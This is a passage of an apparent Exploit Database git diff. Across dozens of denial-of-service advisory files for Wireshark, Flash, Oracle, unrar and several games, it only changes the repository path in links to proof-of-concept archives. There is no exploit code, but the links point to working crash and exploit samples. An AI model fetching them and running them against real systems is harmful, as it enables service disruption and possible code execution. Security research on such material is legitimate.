+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31998.zip \ No newline at end of file diff --git a/exploits/multiple/dos/32006.txt b/exploits/multiple/dos/32006.txt index 3b4b6f84d..4ef2b64f2 100644 --- a/exploits/multiple/dos/32006.txt +++ b/exploits/multiple/dos/32006.txt @@ -6,6 +6,6 @@ Exploiting these issues may allow attackers to obtain potentially sensitive info These issues affect Wireshark 0.9.5 up to and including 1.0.0. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32006-1.pcap -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32006-2.pcap -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32006-3.pcap \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32006-1.pcap +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32006-2.pcap +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32006-3.pcap \ No newline at end of file diff --git a/exploits/multiple/dos/32104.txt b/exploits/multiple/dos/32104.txt index f7dfd60b4..5d8c5a75f 100644 --- a/exploits/multiple/dos/32104.txt +++ b/exploits/multiple/dos/32104.txt @@ -6,4 +6,4 @@ An attacker could exploit this issue to crash the affected application, denying This issue affects ZDaemon 1.08.07 and earlier versions. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32104.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32104.zip \ No newline at end of file diff --git a/exploits/multiple/dos/32125.txt b/exploits/multiple/dos/32125.txt index 36c24dab7..d125dd7e4 100644 --- a/exploits/multiple/dos/32125.txt +++ b/exploits/multiple/dos/32125.txt @@ -6,4 +6,4 @@ An attacker could exploit this issue to crash the affected application, denying This issue affects Unreal Tournament 2004 v3369 and prior versions. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32125.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32125.zip \ No newline at end of file diff --git a/exploits/multiple/dos/32127.txt b/exploits/multiple/dos/32127.txt index 530f1bc75..0cca29040 100644 --- a/exploits/multiple/dos/32127.txt +++ b/exploits/multiple/dos/32127.txt @@ -9,4 +9,4 @@ These issues affect the following versions: Unreal Tournament 3 1.3beta4 Unreal Tournament 3 1.2 and prior -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32127.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32127.zip \ No newline at end of file diff --git a/exploits/multiple/dos/32192.txt b/exploits/multiple/dos/32192.txt index 4a7afdcf5..9f8e97f2e 100644 --- a/exploits/multiple/dos/32192.txt +++ b/exploits/multiple/dos/32192.txt @@ -6,5 +6,5 @@ An attacker may exploit these issues to crash the affected application, denying Halo: Combat Evolved 1.0.7.0615 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32192-1.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32192-2.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32192-1.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32192-2.zip \ No newline at end of file diff --git a/exploits/multiple/dos/32362.txt b/exploits/multiple/dos/32362.txt index 1a5f32d47..c08187484 100644 --- a/exploits/multiple/dos/32362.txt +++ b/exploits/multiple/dos/32362.txt @@ -6,4 +6,4 @@ An attacker could exploit this issue to crash applications that use the vulnerab This issue affects Unreal Engine 3; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32362.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32362.zip \ No newline at end of file diff --git a/exploits/multiple/dos/32386.txt b/exploits/multiple/dos/32386.txt index f60eb23bf..d7aa11c26 100644 --- a/exploits/multiple/dos/32386.txt +++ b/exploits/multiple/dos/32386.txt @@ -15,4 +15,4 @@ WarPath Postal 2 Shadow Ops -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32386.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32386.zip \ No newline at end of file diff --git a/exploits/multiple/dos/33080.txt b/exploits/multiple/dos/33080.txt index f2f5c287d..6f3bf2a8f 100644 --- a/exploits/multiple/dos/33080.txt +++ b/exploits/multiple/dos/33080.txt @@ -6,4 +6,4 @@ The vulnerability can be exploited over the 'Oracle Net' protocol. An attacker d Successfully exploiting this issue will allow the attacker to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33080.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33080.zip \ No newline at end of file diff --git a/exploits/multiple/dos/33083.txt b/exploits/multiple/dos/33083.txt index 0f6e93145..81d38d973 100644 --- a/exploits/multiple/dos/33083.txt +++ b/exploits/multiple/dos/33083.txt @@ -14,4 +14,4 @@ Oracle11g 11.1.0.7 Other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33083.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33083.zip \ No newline at end of file diff --git a/exploits/multiple/dos/33099.txt b/exploits/multiple/dos/33099.txt index fbfb4c64e..fbc9162e3 100644 --- a/exploits/multiple/dos/33099.txt +++ b/exploits/multiple/dos/33099.txt @@ -6,4 +6,4 @@ An attacker could exploit this issue to crash the affected application, denying This issue affects World in Conflict 1.0.1.1 and prior versions. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33099.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33099.zip \ No newline at end of file diff --git a/exploits/multiple/dos/33100.txt b/exploits/multiple/dos/33100.txt index 09d11f9f6..16b43e92b 100644 --- a/exploits/multiple/dos/33100.txt +++ b/exploits/multiple/dos/33100.txt @@ -8,4 +8,4 @@ The issue affects S.T.A.L.K.E.R. Clear Sky 1.5.10 (1.0010) and prior versions. NOTE: This issue may be related to the issue described in BID 29723 (S.T.A.L.K.E.R. Remote Denial of Service Vulnerability). We will update this BID if more information emerges. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33100.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33100.zip \ No newline at end of file diff --git a/exploits/multiple/dos/33104.txt b/exploits/multiple/dos/33104.txt index cbbe011fb..7440c296e 100644 --- a/exploits/multiple/dos/33104.txt +++ b/exploits/multiple/dos/33104.txt @@ -7,4 +7,4 @@ Given the nature of this issue, the attacker may also be able to run arbitrary c This issue affects Star Wars Battlefront II 1.1 and prior versions. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33104.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33104.zip \ No newline at end of file diff --git a/exploits/multiple/dos/33105.txt b/exploits/multiple/dos/33105.txt index a4f2942bb..a9a772670 100644 --- a/exploits/multiple/dos/33105.txt +++ b/exploits/multiple/dos/33105.txt @@ -9,4 +9,4 @@ This issue affects the following: TrackMania Nations Forever 2.11.11 TrackMania United Forever 2.11.11 -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33105.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33105.zip \ No newline at end of file diff --git a/exploits/multiple/dos/33182.txt b/exploits/multiple/dos/33182.txt index 324511b3a..12756bae8 100644 --- a/exploits/multiple/dos/33182.txt +++ b/exploits/multiple/dos/33182.txt @@ -6,5 +6,5 @@ An attacker could exploit this issue to restart races on vulnerable servers, res Live For Speed S2 Z13 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33182-1.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33182-2.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33182-1.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33182-2.zip \ No newline at end of file diff --git a/exploits/multiple/dos/33735.txt b/exploits/multiple/dos/33735.txt index 217ed2481..b8e38d7eb 100644 --- a/exploits/multiple/dos/33735.txt +++ b/exploits/multiple/dos/33735.txt @@ -9,4 +9,4 @@ SUPERAntiSpyware and Super Ad Blocker are prone to multiple local vulnerabilitie An attacker can exploit these issues to gain elevated privileges on the affected computer, crash the affected computer, gain access to sensitive information, or overwrite arbitrary files. Other attacks are also possible. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33735.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33735.zip \ No newline at end of file diff --git a/exploits/multiple/dos/34270.txt b/exploits/multiple/dos/34270.txt index c3910ab24..15d24a6ed 100644 --- a/exploits/multiple/dos/34270.txt +++ b/exploits/multiple/dos/34270.txt @@ -6,4 +6,4 @@ Successful exploits may allow attackers to cause denial-of-service conditions. D GRAW 1.35 and GRAW 2 1.05 are vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/34270.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34270.zip \ No newline at end of file diff --git a/exploits/multiple/dos/34340.txt b/exploits/multiple/dos/34340.txt index 0c6727cb0..488347b88 100644 --- a/exploits/multiple/dos/34340.txt +++ b/exploits/multiple/dos/34340.txt @@ -19,4 +19,4 @@ WarPath XIII Other games may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/34340.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34340.zip \ No newline at end of file diff --git a/exploits/multiple/dos/34360.txt b/exploits/multiple/dos/34360.txt index b21d90c29..61f7f9bdb 100644 --- a/exploits/multiple/dos/34360.txt +++ b/exploits/multiple/dos/34360.txt @@ -4,4 +4,4 @@ Monolith Lithtech Game Engine is prone to a memory-corruption vulnerability. An attacker can exploit this issue to cause a denial-of-service condition, or execute arbitrary code within the context of the affected application. Other attacks may also be possible. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/34360.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34360.zip \ No newline at end of file diff --git a/exploits/multiple/dos/34457.txt b/exploits/multiple/dos/34457.txt index cc03013aa..087c547c4 100644 --- a/exploits/multiple/dos/34457.txt +++ b/exploits/multiple/dos/34457.txt @@ -6,4 +6,4 @@ Successful exploits may allow remote attackers to cause denial-of-service condit Versions prior to Sniper Elite 1.0 are vulnerable. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/34457.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34457.zip \ No newline at end of file diff --git a/exploits/multiple/dos/35369.txt b/exploits/multiple/dos/35369.txt index 0a6aae982..650f77e6b 100644 --- a/exploits/multiple/dos/35369.txt +++ b/exploits/multiple/dos/35369.txt @@ -6,4 +6,4 @@ An attacker may exploit this issue to crash the application, resulting in a deni Battlefield 2 version 1.50 and Battlefield 2142 version 1.51 are vulnerable. Other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/35369.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35369.zip \ No newline at end of file diff --git a/exploits/multiple/dos/36570.txt b/exploits/multiple/dos/36570.txt index 5dadc8540..0254aed95 100644 --- a/exploits/multiple/dos/36570.txt +++ b/exploits/multiple/dos/36570.txt @@ -4,4 +4,4 @@ Rockwell Automation FactoryTalk Activation Server is prone to multiple remote de An attacker can exploit these issues to crash the affected application, denying service to legitimate users. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/36570.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/36570.zip \ No newline at end of file diff --git a/exploits/multiple/dos/37850.txt b/exploits/multiple/dos/37850.txt index eadfd8461..aa66609f4 100644 --- a/exploits/multiple/dos/37850.txt +++ b/exploits/multiple/dos/37850.txt @@ -29,4 +29,4 @@ function f(){ A fla, an AS file and two swfs are attached. shareddelete.fla compiles to shareddelete.swf and contains the code that causes the use-after-free. loadswf.as compiles to loadswf.swf, and sets up the heap to cause a crash. To make the issue occur, put loadswf.swf and shareddelete.swf in the same folder on a webserver (the PoCs don't always work locally due to flash network sandboxing), and load loadswf.swf. This PoC only works on 64-bit systems, but the issue would work on a 32-bit system with proper heap set-up. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37850.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37850.zip \ No newline at end of file diff --git a/exploits/multiple/dos/37852.txt b/exploits/multiple/dos/37852.txt index af1e8c4ed..6bed1edc6 100644 --- a/exploits/multiple/dos/37852.txt +++ b/exploits/multiple/dos/37852.txt @@ -31,4 +31,4 @@ function c(){ A fla, an AS file and two swfs are attached. donotdelete.fla compiles to donotdelete.swf and contains the code that causes the use-after-free. loadswf.as compiles to loadswf.swf, and sets up the heap to cause a crash. To make the issue occur, put loadswf.swf and donotdelete.swf in the same folder on a webserver (the PoCs don't always work locally due to flash network sandboxing), and load loadswf.swf. This PoC only works on 64-bit systems, but the issue would work on a 32-bit system with proper heap set-up. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37852.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37852.zip \ No newline at end of file diff --git a/exploits/multiple/dos/37855.txt b/exploits/multiple/dos/37855.txt index 0c8106265..728bee3d8 100644 --- a/exploits/multiple/dos/37855.txt +++ b/exploits/multiple/dos/37855.txt @@ -38,4 +38,4 @@ function f(){ A fla, an AS file and two swfs are attached. slot.fla compiles to setnum.swf and contains the code that causes the use-after-free. loadswf.as compiles to loadswf.swf, and sets up the heap to cause a crash. To make the issue occur, put loadswf.swf and slot.swf in the same folder on a webserver (the PoCs don't always work locally due to flash network sandboxing), and load loadswf.swf. This PoC only works on 64-bit systems, but the issue would work on a 32-bit system with proper heap set-up. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37855.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37855.zip \ No newline at end of file diff --git a/exploits/multiple/dos/37859.txt b/exploits/multiple/dos/37859.txt index 5149d8ece..1d1ec435d 100644 --- a/exploits/multiple/dos/37859.txt +++ b/exploits/multiple/dos/37859.txt @@ -54,4 +54,4 @@ function f(a, b){ A sample fla and swf are also attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37859.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37859.zip \ No newline at end of file diff --git a/exploits/multiple/dos/37863.txt b/exploits/multiple/dos/37863.txt index c72cdb236..b8931da83 100644 --- a/exploits/multiple/dos/37863.txt +++ b/exploits/multiple/dos/37863.txt @@ -23,4 +23,4 @@ function func() { A sample fla and swf is attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37863.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37863.zip \ No newline at end of file diff --git a/exploits/multiple/dos/37864.txt b/exploits/multiple/dos/37864.txt index a2ef2d1fc..f4de61865 100644 --- a/exploits/multiple/dos/37864.txt +++ b/exploits/multiple/dos/37864.txt @@ -46,4 +46,4 @@ function func(){ A sample fla and swf are attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37864.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37864.zip \ No newline at end of file diff --git a/exploits/multiple/dos/37865.txt b/exploits/multiple/dos/37865.txt index 54b9b9446..004a98c58 100644 --- a/exploits/multiple/dos/37865.txt +++ b/exploits/multiple/dos/37865.txt @@ -16,4 +16,4 @@ _root.attachMovie("myResetButton","newResetButton",200, n); A sample fla and swf are attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37865.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37865.zip \ No newline at end of file diff --git a/exploits/multiple/dos/37871.txt b/exploits/multiple/dos/37871.txt index 3ef282070..e9548324a 100644 --- a/exploits/multiple/dos/37871.txt +++ b/exploits/multiple/dos/37871.txt @@ -21,4 +21,4 @@ function func(){ A swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37871.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37871.zip \ No newline at end of file diff --git a/exploits/multiple/dos/37872.txt b/exploits/multiple/dos/37872.txt index dd6d58750..7cc434efb 100644 --- a/exploits/multiple/dos/37872.txt +++ b/exploits/multiple/dos/37872.txt @@ -20,4 +20,4 @@ In [1], the passed in index is validated. In [2], the callback can run actionscr The PoC works by triggering a wild copy in order to demonstrate the crash. But other side-effects are possible such as decrementing the refcount of an out-of-bounds index. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37872.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37872.zip \ No newline at end of file diff --git a/exploits/multiple/dos/37873.txt b/exploits/multiple/dos/37873.txt index ec16c48e3..abb0b34ae 100644 --- a/exploits/multiple/dos/37873.txt +++ b/exploits/multiple/dos/37873.txt @@ -21,4 +21,4 @@ function strfunc(){ A sample SWF and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37873.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37873.zip \ No newline at end of file diff --git a/exploits/multiple/dos/37874.txt b/exploits/multiple/dos/37874.txt index 576789a52..85e3454ac 100644 --- a/exploits/multiple/dos/37874.txt +++ b/exploits/multiple/dos/37874.txt @@ -13,4 +13,4 @@ This issue is low-impact because the type-confused objects are read into the fon A sample SWF and fla are attached, these samples intentionally crash to demonstrate the issue. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37874.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37874.zip \ No newline at end of file diff --git a/exploits/multiple/dos/37877.txt b/exploits/multiple/dos/37877.txt index cf8c34270..656d214e9 100644 --- a/exploits/multiple/dos/37877.txt +++ b/exploits/multiple/dos/37877.txt @@ -20,4 +20,4 @@ function func(){ A PoC and fla are attached. Some other setters (thickness, tabIndex, etc.) are also impacted by the same UaF condition, additional SWFs are attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37877.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37877.zip \ No newline at end of file diff --git a/exploits/multiple/dos/37878.txt b/exploits/multiple/dos/37878.txt index e7f301495..06a2e2d18 100644 --- a/exploits/multiple/dos/37878.txt +++ b/exploits/multiple/dos/37878.txt @@ -48,4 +48,4 @@ function func(){ A sample SWF and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37878.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37878.zip \ No newline at end of file diff --git a/exploits/multiple/dos/37882.txt b/exploits/multiple/dos/37882.txt index 7b1f42b7b..e06a2577c 100644 --- a/exploits/multiple/dos/37882.txt +++ b/exploits/multiple/dos/37882.txt @@ -3,4 +3,4 @@ Source: https://code.google.com/p/google-security-research/issues/detail?id=443& If an mp3 file contains compressed ID3 data that is larger than 0x2aaaaaaa bytes, an integer overflow will occur in allocating the buffer to contain its converted string data, leading to a large copy into a small buffer. A sample fla, swf and mp3 are attached. Put id34.swf and tag.mp3 in the same folder to reproduce the issue. This issue only works on 64 bit platforms. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37882.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37882.zip \ No newline at end of file diff --git a/exploits/multiple/dos/38490.txt b/exploits/multiple/dos/38490.txt index f9aac080e..a9259e63f 100644 --- a/exploits/multiple/dos/38490.txt +++ b/exploits/multiple/dos/38490.txt @@ -9,4 +9,4 @@ This bug is in the AVM serializer (http://hg.mozilla.org/tamarin-redux/file/5571 One challenge with the bug is actually creating a SWF which can hit this code, as usually overriding a defined method will lead to an illegal override exception. The 0-day author did this differently than I did. The code where all class properties (methods, internal classes, variables, etc.) are resolved is in http://hg.mozilla.org/tamarin-redux/file/5571cf86fc68/core/Traits.cpp. You can see on line 813 that a check that no two properties of a class have the same name is commented out due to some legitimate SWFs doing that. This means that a SWF can have a variable with the same name as a method (overriding a method with less restrictive method is still illegal), which is how my PoC overrode the method. The 0-day did something slightly different, it put the redefinition of writeExternal in a different public namespace than the original definition of writeExternal. This has the benefit that the ActionScript will compile and hit the bug without modification. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38490.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38490.zip \ No newline at end of file diff --git a/exploits/multiple/dos/38662.txt b/exploits/multiple/dos/38662.txt index 8d6864b5a..178541690 100644 --- a/exploits/multiple/dos/38662.txt +++ b/exploits/multiple/dos/38662.txt @@ -108,4 +108,4 @@ Shadow byte legend (one shadow byte represents 8 application bytes): The issue was reported in https://savannah.nongnu.org/bugs/?46379. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38662.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38662.zip \ No newline at end of file diff --git a/exploits/multiple/dos/38930.txt b/exploits/multiple/dos/38930.txt index a4d2bd95d..17a7ca567 100644 --- a/exploits/multiple/dos/38930.txt +++ b/exploits/multiple/dos/38930.txt @@ -5,4 +5,4 @@ The attached file crashes in CmdExtract::UnstoreFile because the signed int64 De I observed this crash in Avast Antivirus, but the origin of the code appears to be the unrar source distribution. I imagine many other antiviruses will be affected, and presumably WinRAR and other archivers. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38930.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38930.zip \ No newline at end of file diff --git a/exploits/multiple/dos/38931.txt b/exploits/multiple/dos/38931.txt index d273f23c3..bdb458e20 100644 --- a/exploits/multiple/dos/38931.txt +++ b/exploits/multiple/dos/38931.txt @@ -23,4 +23,4 @@ $7 = 0xe73f181f $8 = 0x1060 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38931.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38931.zip \ No newline at end of file diff --git a/exploits/multiple/dos/38932.txt b/exploits/multiple/dos/38932.txt index 582fe7111..148aa3752 100644 --- a/exploits/multiple/dos/38932.txt +++ b/exploits/multiple/dos/38932.txt @@ -3,4 +3,4 @@ Source: https://code.google.com/p/google-security-research/issues/detail?id=551 The attached Microsoft Access Database causes JetDb::IsExploited4x to be called, which contains an unbounded search for objects. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38932.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38932.zip \ No newline at end of file diff --git a/exploits/multiple/dos/38933.txt b/exploits/multiple/dos/38933.txt index 0a438be70..ab808d837 100644 --- a/exploits/multiple/dos/38933.txt +++ b/exploits/multiple/dos/38933.txt @@ -29,4 +29,4 @@ ntdll!RtlpDeCommitFreeBlock+0x146: #12 0x0805498c in engine_scan () Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38933.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38933.zip \ No newline at end of file diff --git a/exploits/multiple/dos/38969.txt b/exploits/multiple/dos/38969.txt index 515b51204..a9a603b15 100644 --- a/exploits/multiple/dos/38969.txt +++ b/exploits/multiple/dos/38969.txt @@ -6,4 +6,4 @@ A sample swf is attached. ActionScript code is also attached, but it does not co Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38969.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38969.zip \ No newline at end of file diff --git a/exploits/multiple/dos/38970.txt b/exploits/multiple/dos/38970.txt index afebdfda7..9ea50320e 100644 --- a/exploits/multiple/dos/38970.txt +++ b/exploits/multiple/dos/38970.txt @@ -16,4 +16,4 @@ To reproduce the issue, load objectencoding.swf. PoC code is also attached. To u Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38970.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38970.zip \ No newline at end of file diff --git a/exploits/multiple/dos/38992.txt b/exploits/multiple/dos/38992.txt index bfa517f14..8585a6de4 100644 --- a/exploits/multiple/dos/38992.txt +++ b/exploits/multiple/dos/38992.txt @@ -60,4 +60,4 @@ Shadow byte legend (one shadow byte represents 8 application bytes): The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11798. Attached is a file which triggers the crash. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38992.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38992.zip \ No newline at end of file diff --git a/exploits/multiple/dos/38993.txt b/exploits/multiple/dos/38993.txt index a31515f6e..07d5fbcb2 100644 --- a/exploits/multiple/dos/38993.txt +++ b/exploits/multiple/dos/38993.txt @@ -91,4 +91,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38993.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38993.zip \ No newline at end of file diff --git a/exploits/multiple/dos/38994.txt b/exploits/multiple/dos/38994.txt index a18e3737f..714b70217 100644 --- a/exploits/multiple/dos/38994.txt +++ b/exploits/multiple/dos/38994.txt @@ -45,4 +45,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38994.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38994.zip \ No newline at end of file diff --git a/exploits/multiple/dos/38995.txt b/exploits/multiple/dos/38995.txt index d6fe16eef..328bf1fd3 100644 --- a/exploits/multiple/dos/38995.txt +++ b/exploits/multiple/dos/38995.txt @@ -251,4 +251,4 @@ Shadow byte legend (one shadow byte represents 8 application bytes): Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38995.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38995.zip \ No newline at end of file diff --git a/exploits/multiple/dos/38996.txt b/exploits/multiple/dos/38996.txt index 6bc088e1f..fc89c6de2 100644 --- a/exploits/multiple/dos/38996.txt +++ b/exploits/multiple/dos/38996.txt @@ -96,4 +96,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38996.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38996.zip \ No newline at end of file diff --git a/exploits/multiple/dos/38997.txt b/exploits/multiple/dos/38997.txt index b33c88355..b7b912c14 100644 --- a/exploits/multiple/dos/38997.txt +++ b/exploits/multiple/dos/38997.txt @@ -63,4 +63,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38997.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38997.zip \ No newline at end of file diff --git a/exploits/multiple/dos/38998.txt b/exploits/multiple/dos/38998.txt index 8b09121db..e21ca6c49 100644 --- a/exploits/multiple/dos/38998.txt +++ b/exploits/multiple/dos/38998.txt @@ -49,4 +49,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38998.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38998.zip \ No newline at end of file diff --git a/exploits/multiple/dos/38999.txt b/exploits/multiple/dos/38999.txt index b18e55db8..3e8985e68 100644 --- a/exploits/multiple/dos/38999.txt +++ b/exploits/multiple/dos/38999.txt @@ 